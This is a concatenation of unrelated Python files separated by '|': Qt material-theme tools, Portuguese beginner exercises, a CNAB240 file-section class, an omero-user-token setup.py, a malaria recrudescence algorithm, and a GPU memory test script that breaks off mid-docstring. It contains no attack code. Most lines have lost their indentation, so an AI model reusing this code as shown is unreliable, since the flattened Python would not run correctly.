density = (value + (density_interval * int(density_scale)) -
(border * 2)) * scale
if density < 4:
density = 4
return density
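# Worked example (derived from the code above): density(36, '-2') gives
# (36 + 4*(-2) - 0) * 1 = 28; results below 4 are clamped to 4.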
# ----------------------------------------------------------------------
def set_icons_theme(theme, parent='theme'):
""""""
source = os.path.join(os.path.dirname(__file__), 'resources', 'source')
resources = ResourseGenerator(primary=theme['primaryColor'], secondary=theme['secondaryColor'],
disabled=theme['secondaryLightColor'], source=source, parent=parent)
resources.generate()
if GUI:
QDir.addSearchPath('icon', resources.index)
QDir.addSearchPath('qt_material', os.path.join(
os.path.dirname(__file__), 'resources'))
# ----------------------------------------------------------------------
def list_themes():
""""""
themes = os.listdir(os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'themes'))
themes = filter(lambda a: a.endswith('xml'), themes)
return sorted(list(themes))
# ----------------------------------------------------------------------
def deprecated(replace):
""""""
# ----------------------------------------------------------------------
def wrap1(fn):
# ----------------------------------------------------------------------
def wrap2(*args, **kwargs):
logging.warning(
f'This function is deprecated, please use "{replace}" instead.')
fn(*args, **kwargs)
return wrap2
return wrap1
########################################################################
class QtStyleTools:
""""""
extra_values = {}
# ----------------------------------------------------------------------
@deprecated('set_extra')
def set_extra_colors(self, extra):
""""""
self.extra_values = extra
# ----------------------------------------------------------------------
def set_extra(self, extra):
""""""
self.extra_values = extra
# ----------------------------------------------------------------------
def add_menu_theme(self, parent, menu):
""""""
for theme in ['default'] + list_themes():
action = QAction(parent)
action.setText(theme)
action.triggered.connect(self._wrapper(
parent, theme, self.extra_values, self.update_buttons))
menu.addAction(action)
# ----------------------------------------------------------------------
def _wrapper(self, parent, theme, extra, callable_):
""""""
        def inner():
            self._apply_theme(parent, theme, extra, callable_)
        return inner
# ----------------------------------------------------------------------
def _apply_theme(self, parent, theme, extra={}, callable_=None):
""""""
self.apply_stylesheet(parent, theme=theme, invert_secondary=theme.startswith(
'light'), extra=extra, callable_=callable_)
# ----------------------------------------------------------------------
def apply_stylesheet(self, parent, theme, invert_secondary=False, extra={}, callable_=None):
""""""
if theme == 'default':
parent.setStyleSheet('')
return
apply_stylesheet(parent, theme=theme,
invert_secondary=invert_secondary, extra=extra)
if callable_:
callable_()
# ----------------------------------------------------------------------
def update_buttons(self):
""""""
if not hasattr(self, 'colors'):
return
theme = {color_: os.environ[f'QTMATERIAL_{color_.upper()}']
for color_ in self.colors}
if 'light' in os.environ['QTMATERIAL_THEME']:
self.dock_theme.checkBox_ligh_theme.setChecked(True)
elif 'dark' in os.environ['QTMATERIAL_THEME']:
self.dock_theme.checkBox_ligh_theme.setChecked(False)
if self.dock_theme.checkBox_ligh_theme.isChecked():
theme['secondaryColor'], theme['secondaryLightColor'], theme['secondaryDarkColor'] = theme[
'secondaryColor'], theme['secondaryDarkColor'], theme['secondaryLightColor']
for color_ in self.colors:
button = getattr(self.dock_theme, f'pushButton_{color_}')
color = theme[color_]
if self.get_color(color).getHsv()[2] < 128:
text_color = '#ffffff'
else:
text_color = '#000000'
button.setStyleSheet(f"""
*{{
background-color: {color};
color: {text_color};
border: none;
}}""")
self.custom_colors[color_] = color
# ----------------------------------------------------------------------
def get_color(self, color):
""""""
return QColor(*[int(color[s:s + 2], 16) for s in range(1, 6, 2)])
# ----------------------------------------------------------------------
def update_theme(self, parent):
""""""
with open('my_theme.xml', 'w') as file:
file.write("""
<resources>
<color name="primaryColor">{primaryColor}</color>
<color name="primaryLightColor">{primaryLightColor}</color>
<color name="secondaryColor">{secondaryColor}</color>
<color name="secondaryLightColor">{secondaryLightColor}</color>
<color name="secondaryDarkColor">{secondaryDarkColor}</color>
<color name="primaryTextColor">{primaryTextColor}</color>
<color name="secondaryTextColor">{secondaryTextColor}</color>
</resources>
""".format(**self.custom_colors))
light = self.dock_theme.checkBox_ligh_theme.isChecked()
self.apply_stylesheet(parent, 'my_theme.xml', invert_secondary=light,
extra=self.extra_values, callable_=self.update_buttons)
# ----------------------------------------------------------------------
def set_color(self, parent, button_):
""""""
        def inner():
initial = self.get_color(self.custom_colors[button_])
color_dialog = QColorDialog(parent=parent)
color_dialog.setCurrentColor(initial)
done = color_dialog.exec_()
color_ = color_dialog.currentColor()
if done and color_.isValid():
rgb_255 = [color_.red(), color_.green(), color_.blue()]
                color = '#' + ''.join([f'{v:02x}' for v in rgb_255])
self.custom_colors[button_] = color
self.update_theme(parent)
        return inner
# ----------------------------------------------------------------------
def show_dock_theme(self, parent):
""""""
self.colors = ['primaryColor',
'primaryLightColor',
'secondaryColor',
'secondaryLightColor',
'secondaryDarkColor',
'primaryTextColor',
'secondaryTextColor']
self.custom_colors = {
v: os.environ[f'QTMATERIAL_{v.upper()}'] for v in self.colors}
if 'PySide2' in sys.modules or 'PySide6' in sys.modules:
self.dock_theme = QUiLoader().load(os.path.join(
os.path.dirname(__file__), 'dock_theme.ui'))
elif 'PyQt5' in sys.modules or 'PyQt6' in sys.modules:
self.dock_theme = uic.loadUi(os.path.join(
os.path.dirname(__file__), 'dock_theme.ui'))
parent.addDockWidget(
Qt.DockWidgetArea.LeftDockWidgetArea, self.dock_theme)
self.dock_theme.setFloating(True)
self.update_buttons()
self.dock_theme.checkBox_ligh_theme.clicked.connect(
lambda: self.update_theme(self.main))
for color in self.colors:
button = getattr(self.dock_theme, f'pushButton_{color}')
button.clicked.connect(self.set_color(parent, color))
# ----------------------------------------------------------------------
def get_hook_dirs():
package_folder = Path(__file__).parent
return [str(package_folder.absolute())]
|
jogadores = []
jogador = {}
cod = 0
while True:
gols = []
total_de_gols = []
jogador['Código'] = cod
jogador['Nome'] = input('Nome do jogador: ').strip().capitalize()
partidas = int(input(f'Quantas partidas {jogador["Nome"]} jogou? '))
jogador['Partidas'] = partidas
for i in range(1, partidas + 1):
gol = int(input(f' Quantos gols na partida {i}? '))
gols.append(gol)
jogador['Gols'] = gols
jogador['Total'] = sum(gols) # Total de gols
jogadores.append(jogador.copy())
cod += 1
cont = input('Quer continuar? [S/N]: ').upper().strip()
if cont == 'N':
break
string = ''
print('=-=' * 33)
print('{:<30}{:<30}{:<30}{:<30}'.format('Código', 'Nome', 'Gols', 'Total'))
for jog in jogadores:
string += '{:<30}{:<30}{:<30}{:<30}\n'.format(str(jog['Código']), str(jog['Nome']), str(jog['Gols']), str(jog['Total']))
print(string)
print('=-=' * 33)
while True:
    mostrar = int(input('Mostrar dados de qual jogador? (Digite o código) 999 para sair: '))
    if mostrar == 999:
        print('Volte sempre!')
        break
    print('=-=' * 12)
    for jogador in jogadores:
        if jogador["Código"] == mostrar:
            print(f'--LEVANTAMENTO DO JOGADOR {jogador["Nome"]}:')
            for g in range(len(jogador['Gols'])):
                print(f'No jogo {g + 1} fez {jogador["Gols"][g]} gols.')
            break
    else:
        print(f'Não existe jogador com o código {mostrar}.')
    print('=-=' * 12)
|
import json
from keeper_cnab240.attribute import Attribute
class FileSection:
default_date_format = "%d%m%Y"
default_datetime_format = "%d%m%Y %H%M%S"
default_time_format = "%H%M%S"
def __init__(self, section_name, data, attributes):
self.bank = None
self.section_name = section_name
self.attributes = attributes
self.data = data
if self.data is None:
self.data = dict()
self.transform_attributes()
if self.data is not None:
self.associate_data()
def transform_attributes(self):
if self.attributes is not None:
for attr, data in self.attributes.items():
self.attributes[attr] = Attribute(attr, data['type'], data['length'], data['start'], data['end'],
data['default'], data['pad_content'], data['pad_direction'],
data['required'])
def associate_data(self):
if self.data:
if self.bank:
self.data['bank_code'] = self.bank.code
if self.attributes is not None:
for name, attr in self.attributes.items():
if name in self.data:
self.attributes[name].set_value(self.data[name])
elif attr.is_required():
raise Exception('The ' + self.section_name + ' Attribute "' + name + '" is required')
def get_dict(self):
response = dict()
if self.attributes is not None:
response = {}
for attr_name, attr in self.attributes.items():
response[attr_name] = attr.get_value()
return response
def get_json(self):
return json.dumps(self.get_dict())
def to_line(self):
if self.attributes is None:
return None
line = ''
for attr_name, attr in self.attributes.items():
line += attr.get_value()
return line
def get_required_attributes(self):
required_attributes = []
if self.attributes is None:
return required_attributes
for attr_name, attr in self.attributes.items():
if attr.is_required():
required_attributes.append(attr)
return required_attributes
def set_bank(self, bank):
self.bank = bank
def set_data(self, data=None):
if data is None:
data = dict()
for attribute, value in data.items():
self.data[attribute] = value
self.associate_data()
def set_attributes_from_line(self, line=""):
if self.attributes is not None:
for attr_name, attr in self.attributes.items():
self.attributes[attr_name].set_value(line[attr.start:attr.end])
self.attributes[attr_name].value = self.attributes[attr_name].value.strip()
|
# Conor Hogan 10/2/18
# Programming and scripting - Week 3
x = int(input("Enter number here:"))
while x != 1:
    if x % 2 == 0:
        x = x // 2
        print(x)
    else:
        x = (x * 3) + 1
        print(x)
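# Hedged worked example (not part of the exercise): starting from 6, the loop
# prints the Collatz trajectory 3, 10, 5, 16, 8, 4, 2, 1 and then stops, since
# even values are halved and odd values map to 3*x + 1 until x reaches 1.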
|
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import version
# Hack to prevent stupid "TypeError: 'NoneType' object is not callable" error
# in multiprocessing/util.py _exit_function when running `python
# setup.py test` or `python setup.py flake8`. See:
# * http://www.eby-sarna.com/pipermail/peak/2010-May/003357.html)
# * https://github.com/getsentry/raven-python/blob/master/setup.py
import multiprocessing
assert multiprocessing # silence flake8
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = []
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
if isinstance(self.pytest_args, str):
# pytest requires arguments as a list or tuple even if singular
self.pytest_args = [self.pytest_args]
errno = pytest.main(self.pytest_args)
sys.exit(errno)
def read(fname):
"""
Utility function to read the README file.
:rtype : String
"""
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name='omero-user-token',
version=version.getVersion(),
description='OMERO user token management system',
long_description=read('README.md'),
long_description_content_type='text/markdown',
classifiers=[], # Get strings from
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='Glencoe Software, Inc.',
author_email='info@glencoesoftware.com',
url='https://github.com/glencoesoftware/omero-user-token',
license='License :: OSI Approved :: BSD License',
packages=find_packages(),
zip_safe=True,
include_package_data=True,
platforms='any',
setup_requires=['flake8'],
install_requires=[
'click==7.0',
],
tests_require=[],
cmdclass={'test': PyTest},
data_files=[],
entry_points={
'console_scripts': [
'omero_user_token = omero_user_token.cli.omero_user_token:main',
]
}
)
|
from math import hypot
co = float(input('Cateto oposto: '))
ca = float(input('Cateto adjacente: '))
print('O comprimento da hipotenusa é {:.2f}'.format(hypot(co, ca)))
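# Hedged check (illustration only): hypot(co, ca) computes sqrt(co**2 + ca**2),
# so the classic 3-4-5 right triangle yields exactly 5.0.
assert hypot(3, 4) == 5.0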
|
import enum
from functools import lru_cache
from typing import List
import numpy as np
import pandas as pd
from api.calculate_frequencies import calculate_frequencies3, Frequencies
class SampleType(enum.Enum):
REINFECTION = 0
RECRUDESCENCE = 1
class HiddenAlleleType(enum.Enum):
MISSING = 1
OBSERVED = 0
UNKNOWN = np.nan # TODO: Confirm this is needed?
class SiteInstanceState:
'''
A class that holds the current state for a single "arm"/site instance when
running the malaria recrudescence algorithm
'''
def __init__(
self,
ids: np.ndarray,
locinames: np.ndarray,
maxMOI: int,
genotypedata_RR: pd.DataFrame,
additional_neutral: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame]):
'''
Sets up the deterministic initial state of the algorithm
TODO: Elaborate, shorten argument list?
'''
self._create_empty_state(ids.size, locinames.size, maxMOI)
self.MOI0, self.MOIf = self._calculate_sample_MOI(
genotypedata_RR, ids, locinames)
self._initialize_alleles(
genotypedata_RR, alleles_definitions_RR, locinames, maxMOI)
self.recoded_additional_neutral = self.recode_additional_neutral(
additional_neutral, alleles_definitions_RR, locinames, maxMOI)
self.dvect = self._get_initial_dvect(alleles_definitions_RR)
self.qq = np.nan
self.dposterior = 0.75 # TODO: What is this?
# TODO: Unsure if these should be here, since they're read-only state?
# estimate frequencies
self.frequencies_RR = calculate_frequencies3(
pd.concat([genotypedata_RR, additional_neutral]),
alleles_definitions_RR)
self.correction_distance_matrix = self._get_correction_distances(
alleles_definitions_RR)
def _create_empty_state(self, num_ids: int, num_loci: int, max_MOI: int):
'''
Creates the initial empty data structures in the state to be populated
later. The data structures are as follows:
alleles0 - Holds the allele fragment lengths found on Day 0
recoded0 - Holds the indices of the bins the allele0 lengths fall into
hidden0 - Records if a given allele was directly observed in the
original dataset (0) or has to be inferred (1) (TODO: What does nan
mean?)
recr0 - Records which strain we think is recrudescing for each sample
(e.g. recr0[i, j] = 2 means "For sample i at locus j, we think the
2nd strain of the locus is the recrudescent one")
*f - All the "f" variants are the same thing, but for the day of failure
mindistance - The closest of all possible allele length pairs for a
given sample/locus
alldistance - All possible allele length pairs for a given sample/locus
allrecrf - Holds all possible allele combinations for the given sample/
locus, and marks which one we estimate is the recrudescent one
classification - Holds whether we think a given sample is a reinfection
or a recrudescence
:param num_ids: The number of samples in the dataset
:param num_loci: The number of loci in the dataset
:param max_MOI: The max multiplicity of infection in the dataset
'''
self.alleles0 = np.zeros((num_ids, max_MOI * num_loci))
self.recoded0 = np.zeros((num_ids, max_MOI * num_loci))
self.hidden0 = np.full_like(np.empty((num_ids, max_MOI * num_loci)),
HiddenAlleleType.UNKNOWN.value)
self.recr0 = np.full_like(np.empty((num_ids, num_loci)), np.nan)
self.allelesf = np.copy(self.alleles0)
self.recodedf = np.copy(self.recoded0)
self.hiddenf = np.copy(self.hidden0)
self.recrf = np.copy(self.recr0)
self.mindistance = np.zeros((num_ids, num_loci))
self.alldistance = np.full_like(np.empty((num_ids, num_loci, max_MOI ** 2)), np.nan)
self.allrecrf = np.full_like(np.empty((num_ids, num_loci, max_MOI ** 2)), np.nan)
self.classification = np.repeat(SampleType.REINFECTION.value, num_ids)
@classmethod
def _calculate_sample_MOI(
cls,
genotypedata_RR: pd.DataFrame,
ids: np.ndarray,
locinames: np.ndarray):
'''
TODO: Verify the details of what this is doing
Calculates the "multiplicity of infections" (MOIs) on day 0 and the day
of failure for each sample in the dataset. Returns these MOIs via 2
arrays
# TODO: Explain what multiplicity of infection actually means
:param genotypedata_RR: The day 0 and day of failure genotype data for
this site's samples
:param ids: The sample ids in the dataset to calculate MOIs for
:locinames: The names of the unique loci in the dataset
:return: A tuple of 1D numpy arrays of length "ids.size", (MOI0, MOIf)
(which contain the multiplicities on the first/last day for each sample,
respectively)
'''
MOI0 = np.repeat(0, ids.size)
MOIf = np.repeat(0, ids.size)
for i, ID in enumerate(ids):
for lociname in locinames:
locicolumns = genotypedata_RR.columns.str.contains(f"{lociname}_")
num_alleles0 = np.count_nonzero(
~genotypedata_RR.loc[
genotypedata_RR["Sample ID"].str.contains(f"{ID} Day 0"), locicolumns
].isna()
)
num_allelesf = np.count_nonzero(
~genotypedata_RR.loc[
genotypedata_RR["Sample ID"].str.contains(f"{ID} Day Failure"),
locicolumns,
].isna()
)
MOI0[i] = np.max([MOI0[i], num_alleles0])
MOIf[i] = np.max([MOIf[i], num_allelesf])
return MOI0, MOIf
def _initialize_alleles(
self,
genotypedata_RR: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locinames: np.ndarray,
max_MOI: int):
'''
TODO: Verify what this actually does?
Initialize the alleles/recoded state, filling them with the appropriate
initial/failure data from the dataframe
:param genotypedata_RR: The day 0 and day of failure genotype data for
this site's samples
:param alleles_definitions_RR: The bins/ranges that the alleles lengths
could fall into
:param locinames: The names of the loci in genotypedata_RR to get
alleles for
:param max_MOI: The maximum multiplicity of infection in the genotype
data
'''
for i, locus in enumerate(locinames):
oldalleles, newalleles = self._get_original_alleles(
genotypedata_RR, alleles_definitions_RR, locus, i)
startColumn = max_MOI * i # NOTE: Subtracted 1 for indexing reasons in Python vs R, but not for endColumn; double-check that's valid
endColumnOldAllele = max_MOI * i + oldalleles.shape[1]
endColumnNewAllele = max_MOI * i + newalleles.shape[1]
self.alleles0[:, startColumn:endColumnOldAllele] = oldalleles[
genotypedata_RR["Sample ID"].str.contains("Day 0"), :
]
self.allelesf[:, startColumn:endColumnOldAllele] = oldalleles[
genotypedata_RR["Sample ID"].str.contains("Day Failure"), :
]
self.recoded0[:, startColumn:endColumnNewAllele] = newalleles[
genotypedata_RR["Sample ID"].str.contains("Day 0"), :
]
self.recodedf[:, startColumn:endColumnNewAllele] = newalleles[
genotypedata_RR["Sample ID"].str.contains("Day Failure"), :
]
@classmethod
def recode_additional_neutral(
cls,
additional_neutral: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locinames: np.ndarray,
max_MOI: int):
'''
TODO: Verify what this actually does?
If additional_neutral data is present, return a recoded version with
the allele lengths appropriately binned; otherwise, returns an empty
numpy array
:param additional_neutral: The background genotype data for this site's
sample data
:param alleles_definitions_RR: TODO:
:param locinames: The names of the loci in additional_neutral to get
alleles for
:param max_MOI: The maximum multiplicity of infection in the additional
data
:return: The recoded additional_neutral array, or an empty numpy array
if there is no additional_neutral data
'''
if additional_neutral.size == 0 or additional_neutral.shape[0] == 0:
return np.empty([0,0])
recoded_additional_neutral = np.zeros((additional_neutral.shape[0], max_MOI * locinames.size))
for i, locus in enumerate(locinames):
oldalleles, newalleles = cls._get_original_alleles(
additional_neutral, alleles_definitions_RR, locus, i)
# TODO: Same indexing as for _initializing_alleles?
startColumn = max_MOI * i
endColumn = startColumn + oldalleles.shape[1]
recoded_additional_neutral[:, startColumn:endColumn] = newalleles
return recoded_additional_neutral
@classmethod
def _get_original_alleles(
cls,
samples_df: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locus: str,
locus_index: int):
'''
TODO: Verify what this actually does?
Return the oldalleles/newalleles from the given dataframe, with NaN
values set to 0
:param samples_df: The dataframe containing the samples
:param alleles_definitions_RR:
:param locus: The locus in the dataframe to get alleles for
:param locus_index: The index of the locus among the unique locinames in
the dataframe
:return: A tuple of 2 numpy arrays: (oldalleles, newalleles)
'''
locicolumns = samples_df.columns.str.contains(f"{locus}_")
oldalleles = samples_df.loc[:, locicolumns].to_numpy()
newalleles = np.copy(oldalleles)
num_columns = oldalleles.shape[1]
for j in range(num_columns):
newalleles[:, j] = np.array(list(map(
lambda x: cls._recode_allele(
alleles_definitions_RR[locus_index].to_numpy(),
oldalleles[x, j]),
range(0, oldalleles.shape[0])
)))
# Set all nans in either array to 0
oldalleles[np.isnan(oldalleles)] = 0
oldalleles[np.isnan(newalleles)] = 0
newalleles[np.isnan(newalleles)] = 0
return oldalleles, newalleles
@classmethod
def _recode_allele(
cls,
alleles_definitions_subset: np.ndarray,
proposed: float):
'''
Returns the index of the alleles_definitions bin that the proposed
allele length falls into, or np.nan if it doesn't fall within any
of the subset's ranges
:param alleles_definitions_subset: Nx2 2D numpy array, representing
(mutually exclusive) ranges of allele lengths the proposed value can
fall between
:param proposed: Value that should fall between one of the ranges in the
subset
:return: Returns a single integer index of the row/range the proposed
number falls within in the subset, or np.nan if no valid range was
found
'''
# verify shapes.
if len(alleles_definitions_subset.shape) != 2 or alleles_definitions_subset.shape[1] != 2:
raise ValueError(f'Improper alleles_definition_subset shape {alleles_definitions_subset.shape} (expected (:,2))')
# alleles_definitions_subset ranges guaranteed to be non-overlapping, so it will always fall within either 0 or exactly 1 of the ranges (i.e. rows)
result = np.argwhere(np.logical_and(proposed > alleles_definitions_subset[:, 0], proposed <= alleles_definitions_subset[:, 1]))
result = result.reshape(-1)
        if result.size == 0:
            return np.nan
        return result[0]
@classmethod
def _get_initial_dvect(cls, alleles_definitions_RR: pd.DataFrame):
'''
TODO: Understand this better?
Return the initial distance vector (estimating the likelihood of error
in the analysis)
'''
ranges = []
for dataframe in alleles_definitions_RR:
# Get the range (max-min) of the first "nloci" dataframes, then the max of all those
ranges.append(dataframe.max().max() - dataframe.min().min())
dvect = np.zeros(1 + int(round(max(ranges))))
dvect[0] = 0.75
dvect[1] = 0.2
dvect[2] = 0.05
return dvect
@classmethod
def _get_correction_distances(
cls,
alleles_definitions_RR: List[pd.DataFrame]) -> List[np.ndarray]:
'''
TODO: Verify this description
Returns the matrix of distances between each pair of alleles, for each
locus
:param alleles_definitions_RR: TODO:
:return: Python array of 2D matrices of distances between each allele
pair for a given locus
'''
correction_distance_matrix = [] # for each locus, matrix of distances between each allele
# TODO: Vectorize this (it seems fairly doable)
for i in range(len(alleles_definitions_RR)):
# Wrap mean call in "array" so we get a 2D array we can transpose (getting us a grid of distances, not just a 1D vector)
distances = np.array([np.mean(alleles_definitions_RR[i], axis=1)])
distance_combinations = np.abs(distances.T - distances)
correction_distance_matrix.append(distance_combinations)
return correction_distance_matrix
def randomize_initial_assignments(
self,
num_ids: int,
num_loci: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
seed: int = None):
'''
TODO: Elaborate
Assign random initial values for the hidden alleles and
reinfection/recrudescence classifications, based on the prior calculated
frequencies for the malaria dataset
'''
random = np.random.RandomState(seed)
for id_index in range(num_ids):
# 50% chance if this sample should be initialized as a reinfection
# or recrudescence
            if random.uniform() < 0.5:
self.classification[id_index] = SampleType.RECRUDESCENCE.value
for locus_index in range(num_loci):
self._randomize_hidden_alleles(
id_index,
locus_index,
max_MOI,
alleles_definitions_RR,
random)
self._assign_closest_recrudescences(id_index, locus_index, max_MOI)
self.qq = self._get_initial_qq(self.hidden0, self.hiddenf)
def _randomize_hidden_alleles(
self,
id_index: int,
locus_index: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
rand: np.random.RandomState):
'''
TODO: Elaborate
Randomizes the initial allele values for the given ID/locus
:param id_index: The index of the current ID to set alleles for
:param locus_index: The index of the current locus to set alleles for
:param max_MOI: The maximum multiplicity of infection in the dataset
:param alleles_definitions_RR:
:param rand: A generator for the random numbers in this function
'''
self._randomize_allele_group(
self.alleles0, self.recoded0, self.hidden0, self.MOI0,
id_index, locus_index, max_MOI, alleles_definitions_RR, rand)
self._randomize_allele_group(
self.allelesf, self.recodedf, self.hiddenf, self.MOIf,
id_index, locus_index, max_MOI, alleles_definitions_RR, rand)
def _randomize_allele_group(
self,
alleles: np.ndarray,
recoded: np.ndarray,
hidden: np.ndarray,
MOIs: np.ndarray,
id_index: int,
locus_index: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
rand: np.random.RandomState):
'''
TODO: Cut down on the parameter list (combine last few elements in
tuple?)
NOTE: Depends on assuming alleles, recoded, and hidden will be modified
in-place (i.e. that they're passed by reference)
'''
i = id_index
j = locus_index
# TODO: Start/end of what? The portion of the row w/ this locus information?
start = max_MOI * j
end = max_MOI * (j + 1)
# Find all the non-zero length alleles (meaning we've observed them)
num_alleles = np.count_nonzero(alleles[i, start:end])
num_missing = MOIs[i] - num_alleles
# TODO: Eliminate code duplication if possible?
missing_alleles_indices = np.arange(start, end)[
np.where(alleles[i, start: start + MOIs[i]] == 0)
]
present_alleles_indices = np.arange(start, end)[
np.where(alleles[i, start: start + MOIs[i]] != 0)
]
# Sample to randomly initialize the missing alleles/hidden variables
# (no need to sample for observed alleles w/ known lengths)
if num_alleles > 0:
hidden[i, present_alleles_indices] = HiddenAlleleType.OBSERVED.value
if num_missing == 0:
return
new_hidden_alleles = rand.choice(
# Select from first row (count of how many probabilities they are)
np.arange(0, int(self.frequencies_RR.lengths[j])),
size=num_missing,
replace=True,
p=self.frequencies_RR.matrix[j, 0: int(self.frequencies_RR.lengths[j])]
)
# Choose random initial data for missing alleles
recoded[i, missing_alleles_indices] = new_hidden_alleles
# calculate row means (mean allele lengths)
alleles[i, missing_alleles_indices] = np.mean(alleles_definitions_RR[j], axis=1)[new_hidden_alleles]
hidden[i, missing_alleles_indices] = HiddenAlleleType.MISSING.value
# TODO: Find some way to set the cache size = to number of samples?
@lru_cache(maxsize=128)
def get_all_possible_recrud(self, sample_id: int) -> np.ndarray:
'''
Returns all possible pairs of alleles that could be recrudescing for
this sample
'''
return np.stack(
np.meshgrid(np.arange(self.MOI0[sample_id]), np.arange(self.MOIf[sample_id]))
).T.reshape(-1, 2)
def _assign_closest_recrudescences(
self,
id_index: int,
locus_index: int,
max_MOI: int):
'''
Finds the closest possible recrudescing allele pairs known for each
locus and sample ID, records them as our initial guess for the
recrudescence, and updates the variables appropriately.
The closest allele pair is assigned as our initial guess for the most
likely allele to be recrudescent with the sample's day 0 allele.
:param id_index: The index of the sample ID being evaluated
:param locus_index: The index of the locus being evaluated
:max_MOI: The maximum multiplicity of infection for the dataset
'''
i = id_index
j = locus_index
# calculate all possible pairs of alleles that could be recrudescing for
# this sample
# NOTE: Correct indices generated, but in a different order than R code
allpossiblerecrud = self.get_all_possible_recrud(i)
# TODO: Much of the below code near-duplicated?
allele0_col_indices = max_MOI * j + allpossiblerecrud[:, 0]
allelef_col_indices = max_MOI * j + allpossiblerecrud[:, 1]
# calculate distances between each possible pair of alleles
recrud_distances = np.abs(
self.alleles0[i, allele0_col_indices] - self.allelesf[i, allelef_col_indices]
)
# select the closest pair, and record the closest distance/distances for
# this sample
closest_recrud_index = np.argmin(recrud_distances)
self.mindistance[i, j] = recrud_distances[closest_recrud_index]
self.alldistance[i, j, :recrud_distances.size] = recrud_distances
self.allrecrf[i, j, :allpossiblerecrud.shape[0]] = self.recodedf[
i, max_MOI * j + allpossiblerecrud[:, 1]
]
def set_recrudescences(recr, is_day_0=True):
# TODO: Verify what the purpose of this actually is?
recrud_column = 0 if is_day_0 else 1
recr[i, j] = max_MOI * j + allpossiblerecrud[closest_recrud_index, recrud_column]
set_recrudescences(self.recr0)
set_recrudescences(self.recrf, False)
@classmethod
def _get_initial_qq(cls, hidden0: np.ndarray, hiddenf: np.ndarray):
'''
Initial estimate of q, the probability of an allele being "missing" in
the dataset (as opposed to observed directly)
:param hidden0: An array listing whether each allele for a given sample/
locus has been directly observed or is missing/estimated on Day 0
:param hiddenf: Similar to hidden 0, but whether each allele has been
directly observed or is missing on the Day of Failure for a sample
:return: A single number q, the mean of the known hidden variables
'''
return np.nanmean(np.concatenate([hidden0, hiddenf]))
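# Hedged illustration (not part of the class above): the core of
# SiteInstanceState._recode_allele is an interval lookup over bins of allele
# lengths (lower, upper]. The bins below are made-up example values.
def _recode_allele_demo():
    bins = np.array([[100.0, 102.0], [102.0, 104.0], [104.0, 106.0]])
    hit = np.argwhere((103.5 > bins[:, 0]) & (103.5 <= bins[:, 1])).reshape(-1)
    assert hit[0] == 1     # 103.5 falls in the second bin, so its index is returned
    miss = np.argwhere((99.0 > bins[:, 0]) & (99.0 <= bins[:, 1])).reshape(-1)
    assert miss.size == 0  # 99.0 is outside every bin, so the method returns np.nan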
|
import numpy as np
import torch
from pynvml import *
nvmlInit()
from algorithms.gcn_algo import GCN
device = torch.device('cuda:0')
print("*********** 0 ***********")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
#print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
#print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** 0 ***********")
ts = list()
for i in range(100):
a_cpu = torch.ones((26843540,), dtype=torch.float32)
a_gpu = a_cpu.to(device)
ts.append(a_gpu)
print("********** {} ************".format(i))
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** {} ***********".format(i))
if i % 10 == 0:
input()
del ts[:50]
print("********** del half before empty ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** del half before empty ***********")
input()
"""
torch.cuda.empty_cache()
print("********** del half after empty ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** del half after empty ***********")
input()
"""
estimate_available = info.free + (torch.cuda.memory_cached(0) - torch.cuda.memory_allocated(0))
print(estimate_available)
a_cpu = torch.ones((int((0.9*estimate_available)/4),), dtype=torch.float32)
a_gpu = a_cpu.to(device)
print("********** success or fail ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** success or fail ***********")
input()
"""
a = GCN(2, 123)
b = list(a.parameters())
num_floats = 0
for param in b:
print(param.size())
